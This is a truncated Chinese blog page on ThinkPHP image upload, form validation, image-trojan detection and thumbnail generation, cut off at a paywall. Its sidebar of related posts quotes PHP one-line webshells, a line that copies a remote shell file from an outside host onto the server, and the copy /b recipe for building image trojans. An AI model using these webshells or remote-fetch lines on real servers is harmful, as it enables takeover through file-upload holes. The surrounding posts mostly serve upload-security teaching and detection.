thinkphp图片上传+validate表单验证+图片木马检测+缩略图生成

最新推荐文章于 2024-01-08 11:49:27 发布
最新推荐文章于 2024-01-08 11:49:27 发布
阅读量832 收藏 1
点赞数
分类专栏: javascript TP3.2框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang404838334/article/details/78449150
版权
目录1.案例  1.1图片上传    1.2进行图片木马检测    1.3缩略图生成    1.4控制器中调用缩略图生成方法 1.案例  前言:在thinkphp框架的Thinkphp/Library/Think文件中有Upload.class.php(文件上传类),我们上传文件或者图片都要用到这个类   1.1图片上传  HTML代码form id="addForm"
摘要由CSDN通过智能技术生成
    目录

1.案例

  1.1图片上传

    1.2进行图片木马检测

    1.3缩略图生成

    1.4控制器中调用缩略图生成方法

 

1.案例

  前言:在thinkphp框架的Thinkphp/Library/Think文件中有Upload.class.php(文件上传类),我们上传文件或者图片都要用到这个类

 

  1.1图片上传

  HTML代码

<form id="addForm" action="" method="post">
    <input name="file" multiple="multiple" type="file" id="file">
    <input type="submit" value="提交">
<form>

   

  JS代码,进行validate表单验证

 

<script>

    //进行提交表单验证
    $("#addForm").validate({

        //验证规则
        rules: {
            file: {
                required: true
            }
        },

        //错误信息放置位置
        errorPlacement: function (error, element) {
            error.appendTo(element.parent().parent());
        },

        //错误提示信息
        messages: {
            file: {
                required: "请上传图片"
            }
        }
    });

</script>

 

  

   PHP控制器处理,把表单提交的数据,根据自己的需求进行处理。

 

  1.2进行图片木马检测

 

  图片上传完后,可以得到图片的存放路径,我们可以对该图片进行木马检测。

  具体前参考我写的木马检测方法http://www.cnblogs.com/jingmin/p/6308870.html

  如果我们检测到木马后,用 unlink($url) 把这张图片从服务器删除。

  我们也可以在图片上传前对图片进行木马检测。

 

  1.3缩略图生成

  function方法(我们要在function中写入缩略图的生成方法)

<?php
/**
 * 计算生成等比缩略图的宽和高
 * @param $width
 * @param $height
 * @param $picpath
 * @return mixed
 */

//参数(宽,高,图片路径)

function show_pic_scal($width, $height, $src)
{

    //获取上传图片的宽高
    $imginfo
最低0.47元/天 解锁文章
wang404838334
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
php图片一句话木马使用方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-25 2290
php图片一句话木马使用方法,PHP一句话: 1、标准的写法,直接通过eval执行php代码@eval ($_POST['code']); 2、动态执行assert生成一个木马文件(隐藏性最好的一种)@$_GET['a']($_GET['code']); 3、使用方法:从url中入下面参数执行后会在当前目录生成一个c.php的文件/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Y
【安全攻略】Thinkphp5.0检测的文件是否包含木马
美奇软件开发工作室
12-10 4232
一、要做测试,那么肯定是要准备一张带木马图片文件,制作木马图片的方法: 1、创建一个名为test.php的文件,代码: <?php copy("http://www.zy13.net/shell.txt","robots.php"); ?> test.php里的代码说明: copy(要复制的文件,复制文件的目的地); http://php.123.com/shell.txthttp://www.zy13.net/shell.txt是远程服务器里的一个txt文件,里面.
PHP 图片木马隐写方法及靶机演示
百彦子烨的博客
11-11 3505
通常在木马的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木马隐藏到图片中,以此来绕过防御,进行上
php 图片木马检测
weixin_30709635的博客
07-23 610
thinkphp 自带一些基本检测,在网上查了一下 又添加了16进制检测 代码如下 我是在tp的upload 文件里添加调用的 if($this->checkHex($file['tmp_name'])!='0'){ $this->error = '上非法图片'; return false; }; private static function checkHex($imag...
图片php木马制作教程,图片木马制作大法
weixin_39708854的博客
03-28 2594
0x01什么是图片木马图片木马在网络上没有统一的定义,在这里我给出自己的定义。图片木马是一张能正常显示又包含恶意代码(比如一句话木马)的图片文件。根据定义我们知道图片木马两个条件:图片能正常显示包含能执行的而已代码总体思路:将恶意代码写在图片文件中非图片数据区,防止写入导致图片损坏。常规的图片格式有gif,png,jpg格式0x02将恶意代码写在图片尾部适合格式:任何图片格式方法一:copy法准...
thinkphp5上图片生成略图公共方法(分享)
10-18
下面小编就为大家分享一篇thinkphp5上图片生成略图公共方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
thinkPHP实现上图片生成略图功能示例
10-19
主要介绍了thinkPHP实现上图片生成略图功能,结合实例形式分析了thinkPHP图片略图设置、生成、保存、数据库写入等相关操作技巧,需要的朋友可以参考下
ThinkPHP5+UEditor图片到阿里云对象存储OSS功能示例
10-16
主要介绍了ThinkPHP5+UEditor图片到阿里云对象存储OSS功能,结合实例形式分析了ThinkPHP5使用富文本编辑器UEditor实现图片到阿里云的相关操作技巧,需要的朋友可以参考下
ThinkphpUploadPic图片+多图片
03-27
thinkphp+图片+多图片ThinkphpUploadPic) ##图片:使用修改后的uploadify插件 使用方法: 1、添加/Public/plugins/uploadify文件夹; 2、html:见onePic.html,主要是引入js和css文件,在js...
web安全-文件上漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6195
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上时,在我们上文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
制作图片马四种方式 cmd中 copy 1.jpg/b+2.php 3.jpg /b是二进制形式打开 /a是ascii方式打开 看到有人说一定要把图片放前面,木马放后面才能
为了低调的博客
08-20 1777
看到有人说一定要把图片放前面,木马放后面才能成功,我亲自试了这两种制作方式(另一种图片放后面),均能成功连接,但是后者的一句话木马在文件开头,不推荐!/a是ascii方式打开。/b是二进制形式打开。
如何把图片木马改成php格式,铭说 | 一句话木马的多种变形方式
weixin_29775951的博客
04-09 984
原标题:铭说 | 一句话木马的多种变形方式今天来和大家聊一聊,一句话木马的多种变形方式。经常有客户的网站碰到被上小马和大马,这里的“马”是木马的意思,可不是真实的马。通常,攻击者利用文件上漏洞,上一个可执行并且能被解析的脚本文件,通过这个脚本来获得服务器端执行命令的能力,也就是我们经常听到的WebShell,而这个脚本文件就是我们常说的大马和小马。1、都有些什么“马”?小马体积小,功能少,优...
文件上漏洞进阶教程/白名绕过/图片马制作/图片马执行
ChenD的学习笔记
10-23 7475
文件上漏洞进阶教程/白名绕过/图片马制作/图片马执行
php 图片木马,php检测图片木马多进制编程实践
weixin_42355744的博客
03-09 339
前不久,我申请加入了某开源组织,他们要我写一个功能用来检测图片中是否有木马脚本。其实一开始我什么也不知道,只是后来在网上查了一些资料,找到的全是有制作图片木马的教程,并没有找到检测的程序。经过几番思索之后,决定从制作原理来分析这种木马程序。这种木马程序是十六进制编码写的,我灵机一动,写了以下这个上类。最终通过了组织测验。呵呵现在把它拿出来给大家分享,有什么不好的地方,还请指正! anyon@13...
thinkphp 检测图片中是否含有木马脚本
aiku_de_yu的博客
07-30 1113
1.检测原理   要想检测图片中是否含有木马脚本,首先从制作原理来分析这种木马程序。这种木马程序是十六进制编码写的,图片的十六进制代码中主要包含<% ( ) %>、<? ( ) ?> 、<script | /script>,所以我们可以通过检测十六进制代码来检测木马脚本。 2.解决方案   2.1编写Upload类    要想上图片文件,我们...
php 文件上校验_php实现文件上基本验证
weixin_32374723的博客
03-09 375
本文实例为大家分享了php实现文件上基本验证的具体代码,供大家参考,具体内容如下Html部分文件上PHP服务端部分header("Content-type: text/html; charset=utf-8");//预定义变量//print_r($_FILES);//可以显示错误号,根据错误号来定位错误信息$filename=$_FILES['myFile']['name'];$type=$_...
网安入门11-文件上(前后端绕过,变形马图片马)
最新发布
m0_61499194的博客
01-08 938
现在这个zyh.php既有图片的功能,又有木马的功能,当他后缀为jpg时,就为图片,当他后缀为php时,就为木马。我们思路就来了,上一个php,burp抓包改Content-Type,改成image/jpeg就ok啦。如果开发者限制了上文件的大小,例如一张图片至少要大于200kb,那我们就要用到图片木马。思考:他只让我一个.jpg的图片,我想一个.php的木马,两者什么区别。这一关我们故技重施发现不行了,那么就不只是前端校验了,后端也有校验。改了之后,就回显了上成功之后的相对路径。
js+thinkphp图片
11-20
在使用thinkphp框架进行图片时,可以通过js来实现以下步骤。 首先,需要创建一个,包括一个文件输入框和一个上按钮。给文件输入框和上按钮分别设置一个唯一的id值,便于之后通过js获取它们的元素。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值